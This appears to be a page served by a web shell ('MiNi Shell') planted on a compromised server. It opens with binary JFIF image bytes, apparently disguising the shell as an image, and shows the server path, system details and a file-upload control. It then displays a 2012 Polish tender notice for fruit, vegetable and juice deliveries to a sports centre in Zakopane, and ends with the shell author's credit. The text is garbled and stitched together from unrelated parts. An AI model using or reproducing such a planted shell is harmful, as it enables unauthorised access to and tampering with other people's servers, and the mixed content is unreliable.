JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/80912-N-2012.html

<p class="kh_header"><b>Zakopane: Sukcesywne dostawy owoców, warzyw i soków do Centralnego Ośrodka Sportu Ośrodek Przygotowań Olimpijskich w Zakopanem.</b><br>
<b>Numer ogłoszenia: 80912 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu - Ośrodek Przygotowań Olimpijskich w Zakopanem , ul. Bronisława Czecha 1, 34-500 Zakopane, woj. małopolskie, tel. 18 2012274, faks 18 2014906.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy owoców, warzyw i soków do Centralnego Ośrodka Sportu Ośrodek Przygotowań Olimpijskich w Zakopanem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1 -  OWOCE I WARZYWA		
Ananas świeży-owoc powinien być nie zwiędnięty, skorupka twarda 8szt.
Arbuz-owoc powinien być cały  czysty, bez uszkodzeń, plam chorobowych, o wadze 3-5kg; pakowany luzem	800 kg
Avocado owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte, nienadgnite 5szt.
Banany-owoc powinien posiadać barwę skórki złocistą, bez uszkodzeń, plam chorobowych, pakowany w kartonach o wadze 18kg, 500 kg
Borówki Amerykańskie - owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte, nienadgnite, 20 kg
Botwina - nie powinna być zaparzona, zamarznięta, bez uszkodzeń przez szkodniki, 25Kg
Brzoskwinie - świeże, barwa pomarańczowo-czerwona czyste, nie zaparzone, nienadmarznięte , niezwiędłe, bez plam i uszkodzeń o średnicy do 10cm: pakowane w skrzynki lub kartony standardowe, 80 kg
Buraki ćwikłowe - nie powinny być zaparzone, zamarznięte, zapleśniałe, wybór I- korzenie o średnicy 4-8cm i zabarwieniu w przekroju ciemnoczerwonym; pakowane w worki lub standardowe skrzynki, 600 kg
Cebula czerwona-powinna być zdrowa, bez uszkodzeń, jędrna, czysta, nie powinna być zmarznięta, zaparzona: pakowana w standardowe worki	, 30 kg
Cebula- zdrowa, bez uszkodzeń, jędrna, czysta, dojrzała o barwie łuski, jasnożółtawej; nie powinna być zmarznięta, zaparzona: pakowana w standardowe worki, 350Kg
Cytryny-wyrób I o barwie żółtej, bez nadmiernie wyrośniętych części końcowych i zgrubień bez uszkodzeń i zapleśnień, 450Kg
Czosnek świeży-wyrób I główka czosnku powinna być  cała zwarta, twarda, o wielkości 3cm i ząbkach jędrnych , pokrytych całkowicie łuską, pakowany w standardowe opakowanie, 13Kg
Fasola Piękny Jaś biała w op 0,5 kg - nasiona nie powinny być zbutwiałe, spleśniałe; pakowane w  worki o wadze 5kg, 20Kg
Grapefruit żółty, bez uszkodzeń mechanicznych,  nie nadmarznięte nie nadgniłe, bez plam, wolne od uszkodzeń spowodowanych przez szkodniki, o dojrzałości konsumpcyjnej; wielkości owoców 0,50kg; pakowany w kartonach standardowych, 50kg
Groch łuskany w op 0,5 kg-o barwie żółtej nie powinien posiadać zapachu stęchlizny, pleśni,30 kg
Gruszki-wyrób I powinien być nie zmarznięty, nie nadgnity, 400kg
Jabłka importowane zielone wyrób Extra; owoc prawidłowo wykształcony o typom dla odmiany kształcie, zabarwieniu , smaku i zapachu.,50 kg
Jabłka słodkie deserowe różne, krajowe, owoce prawidłowo wykształcone, nie nadgnite i nie nadmarznięte, pakowane w kartony 14-18 kg, odmiany jonagold, idared, ligol, 700 Kg
Jagody Polskie - owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte, nienadgnite, 20Kg	
Kapusta biała młoda - nie powinna być uszkodzona, nadgnita, przerośnięta, zaparzona, bez obecności gąsienic; główki winne być nie mniejsze niż 1500g  pakowane w skrzyniach lub luzem, 400kg
Kapusta biała-nie powinna być uszkodzona, przerośnięta, zaparzona, bez obecności gąsienic; główki powinne być nie mniejsze niż 1500g  pakowane w skrzyniach lub luzem, 500Kg
Kapusta czerwona-wybór I główki powinne być nie mniejsze niż 1000g  bez uszkodzeń, 180kg
Kapusta kiszona pakowana 0,5 kg -  klasa I powinna mieć barwę białą lub jasnokremową z odcieniem żółtawym, smak słono-kwaśny, bez obcych zapachów; skrawki kapusty powinny być jędrne i chrupkie, może zawierać dodatek marchwi	300kg
Kapusta pekińska-liście winne być nie zwiędłe, nie nadgnite, nie zaparzone, bez obecności gąsienic, kolor jasno zielony, 350kg
Kapusta Włoska - liście winne być nie zwiędłe, nie nadgnite, nie zaparzone, bez obecności gąsienic, kolor jasno zielony, 50kg
Kiwi-wyrób I; owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte; pakowany w kartonach lub skrzynkach standardowych, 800szt
Koperek świeży nie powinien być zagrzany, zaparzony, bez śladów zgnilizny; pakowany w pęczki, 450szt
Limonki-wyrób I o barwie żółtej, bez nadmiernie wyrośniętych części końcowych i zgrubień bez uszkodzeń i zapleśnień, 2Kg
Maliny - owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte, nienadgnite, 20Kg	
Mandarynki-odmiana bezpestkowa, nie nadgniła, o skórce łatwo odstającej od miąższu, pakowane w skrzynki o wadze 9-10 kg, 70kg
Marchew korzeń powinien być czysty,  o zdrowej barwie czerwono-pomarańczowej, cały, bez bocznych rozgałęzień, bez uszkodzeń mechanicznych i przez szkodniki; minimalna średnica korzenia 2cm, 700Kg
Morele świeże barwa pomarańczowa, czyste, nie zaparzone, nienadmarznięte , niezwiędłe, bez plam i uszkodzeń, 30kg
Nektarynki-owoc bez uszkodzeń mechanicznych, niezwiędnięty, pestka łatwo odchodząca od miąższu,700Kg
Ogórki kwaszone powinne być w jednostce opakowania wyrównane pod względem wielkości, kształtne, proste, jędrne, , bez pustych kanałów wewnętrznych, smak i zapach charakterystyczny dla ogórków kwaszonych z wyraźnym udziałem przypraw aromatyczno-smakowych, 200Kg
Ogórki małosolne - winne być wyrównane pod względem wielkości, kształtne, proste, jędrne, , bez pustych kanałów wewnętrznych, smak i zapach charakterystyczny dla ogórków małosolnych, 500Kg
Ogórki zielony szklarniowy nie powinien być zwiędły; bez uszkodzeń, plam chorobowych, powinien posiadać barwę zieloną typową dla odmiany, 1000Kg
Papryka sezonowa  MIX Kolor czerwony, żółty i zielony, produkt powinien być dojrzały,  o odpowiedniej barwie, bez uszkodzeń, niezwiędły, 50Kg
Papryka szklarniowa  MIX Kolor czerwony, żółty i zielony, produkt powinien być dojrzały,  o odpowiedniej barwie, bez uszkodzeń, niezwiędły, 350Kg
Pieczarka świeża barwa biała, grzyby winne być nie nadgnite, kapelusze 5-10 cm średnicy, 120Kg
Pietruszka korzeń korzeń powinien być zdrowy, bez śladów chorób, wybór I o średnicy nie mniejszej niż 2cm i nie większy niż 5 cm, 10Kg
Pietruszka natka pęczki o wadze 25g, bez oznak zaparzenia, zapleśnienia, bez zmian barwy, 200szt
Pomarańcze-owoce powinny być całe, zdrowe, czyste,nie zaparzone, nienadmarznięte , niezwiędłe, bez plam i uszkodzeń o średnicy do 10cm: pakowane w skrzynki lub kartony standardowe, 80Kg
Pomidor  sezonowy powinien być zdrowy, bez plam chorobowych, jędrny nie zwiędnięty, nie pomarszczony, dojrzały pakowany w skrzynki  o standardowej wadze, 400Kg
Pomidor szklarniowy powinien być zdrowy, bez plam chorobowych, jędrny nie zwiędnięty, nie pomarszczony, dojrzały pakowany w skrzynki  o standardowej wadze, 1000kg
Pomidorek koktajlowy powinien być zdrowy, bez plam chorobowych, jędrny niezwiędnięty, nie pomarszczony, dojrzały pakowany w skrzynki  o standardowej wadze, 10Kg
Por na wagę-wybór I korzeń ; cebula o średnicy nie mniejszej niż 2,5cm, liście barwy zielonej, bez zaparzeń i liści nadgniłych; pakowane w paczkach lub skrzynki ażurowe, standardowe, 30Kg
Rzodkiewka powinna być świeża, czysta, nie popękana, nie uszkodzona, nie zwiędła, nie sparciała, wiązana w pęczki z liśćmi; wyrównana pod względem zabarwienia i kształtu, 400szt
Sałata lodowa bez oznak zgnilizny, zaparzeń, bez przerośnięć i szkodników typu ślimaki, 250	szt
Sałata strzępiasta czerwona, zielona warzywa winne być nie nadgnite i nie zaparzone, o intensywnej barwie bez odbarwień, bez uszkodzeń mechanicznych i spowodowanych przez ślimaki, 50 szt.
Sałata zielona wybór I, waga główki nie mniejsza niż 150g, bez oznak zgnilizny, zaparzeń, bez przerośnięć i szkodników typu ślimaki, 250szt
Seler korzenie czyste, zdrowe, całe, bez uszkodzeń, bez śladów gnicia, o miąższu białym o wadze korzenia  nie mniejszej niż 20cm; pakowane w e worki lub skrzynki  standardowe, 250	Kg
Seler naciowy nie powinien posiadać obcych zapachów, zaparzeń, zwiędniętych liści, uszkodzeń mechanicznych, nadgnić oraz obecności gąsienic; pakowany w folie, 30Kg
Szczypiorek-natka szczypiorka powinna być zielona na całej długości, ułożona w pęczki i ucięta równo, bez pożółkłych listków, nie powinna być zwiędnięta, zaparzona; pakowana w pęczki o wadze 25g, 500szt.
Śliwka-owoc o powinien być nie nadgnity i nie nadmarznięty, 20Kg	
Truskawki - owoce bez uszkodzeń mechanicznych, niezmarznięte, niezwiędnięte, nienadgnite, 50Kg
Winogrona białe winogrono o barwie żółtozielonej owoce w opakowaniu powinny być jednej odmiany nie zapleśniałe nie zafermentowane, nie nadgnite; pakowane w standardowe skrzynki, 40Kg
Winogrona czerwone Winogrono o barwie ciemnofioletowej- owoce w opakowaniu powinny być jednej odmiany nie zapleśniałe niezafermentowane, nie nadgnite; pakowane w standartowe skrzynki, 20Kg
Ziemniaki młode - powinne być jędrne, zdrowe, kształtne, suche, nie uszkodzone, nie nadmarznięte, średnica ziemniaków nie powinna przekraczać 4cm a długość 4,5 cm, 6000Kg
Ziemniaki powinny być jędrne, zdrowe, kształtne, suche, nie uszkodze, nie nadmarznięte, średnica ziemniaków nie powinna przekraczać 4cm a długość 4,5 cm pakowane w worki 50kg i 30kg, -1500 kg
	CZĘŚĆ 2 -  SOKI		
Nektar czarna porzeczka  op. 1 L, typ Tymbark lub równoważny, 200l
Sok grapefruit czerwony 100% op. 1 L, typ Tymbark lub równoważny, 30l
Sok grapefruit żółty 100% op. 1 L, typ Tymbark lub równoważny, 30l
Sok multiwitamina 100% op. 1 L, typ Tymbark lub równoważny, 400l
Sok jabłkowy 100% op. 1 L, typ Tymbark lub równoważny, 300l
Sok pomarańczowy 100% op. 1 L, typ Tymbark lub równoważny, 600l
Sok pomidorowy 100% op. 1 L, typ Tymbark lub równoważny, 36l
Soki owocowe różne smaki  karton 0,2 L, typ Tymbark lub równoważny, 500szt.
Soki wielowarzywne butelka 0,25 l typ Tymbark lub równoważny, 60szt
Zamawiający dopuszcza zastosowanie produktów równoważnych w stosunku do produktów w/w, jednakże o tej samej gramaturze i składzie.
Dowóz artykułów na koszt i ryzyko transportem Wykonawcy do internatu Imperial zlokalizowanego w Zakopanem przy ul. O. Balzera 1, sukcesywnie - zgodnie ze składanymi zamówieniami. Zamówienia zamawiający będzie składał faksem na numer wykonawcy lub telefonicznie najpóźniej do godziny 16.00 dnia poprzedzającego datę dostawy. Dostawy zamówionej partii przedmiotu zamówienia odbywać się będą do godziny 08.00 w następnym dniu po złożeniu zamówienia. Zamawiający ustala że zamówienia dotyczące poniedziałków oraz dni poświątecznych składane będą w piątek lub dzień poprzedzający dzień lub dni świąteczne.
Wykonawca powinien posiadać atesty i pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają określonym normom. Zamawiający zastrzega sobie prawo do żądania przedstawienia odpowiednich dokumentów potwierdzających jakość produktów przy danej dostawie.
Dostarczane produkty muszą być wysokiej jakości, muszą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w Polskich Normach oraz posiadać ważne terminy przydatności do spożycia.
Dostawy artykułów żywnościowych muszą być realizowane zgodnie z zasadami Dobrej praktyki higienicznej, dotyczy głownie;
 - stanu higienicznego samochodu
- higieny osobistej kierowcy 
- daty przydatności do spożycia
- temperatury przewozu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.32.10.00-4, 15.32.22.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.cos.pl (zakładka Przetargi/Zakopane)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralny Ośrodek Sportu OPO Zakopane, ul. B Czecha 1, 34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2012 godzina 10:00, miejsce: Centralny Ośrodek Sportu OPO Zakopane, ul. B Czecha 1, 34-500 Zakopane, sekretariat w budynku administracyjnym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> owoce i warzywa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> soki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> soki owocowe i warzywne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.32.10.00-4, 15.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com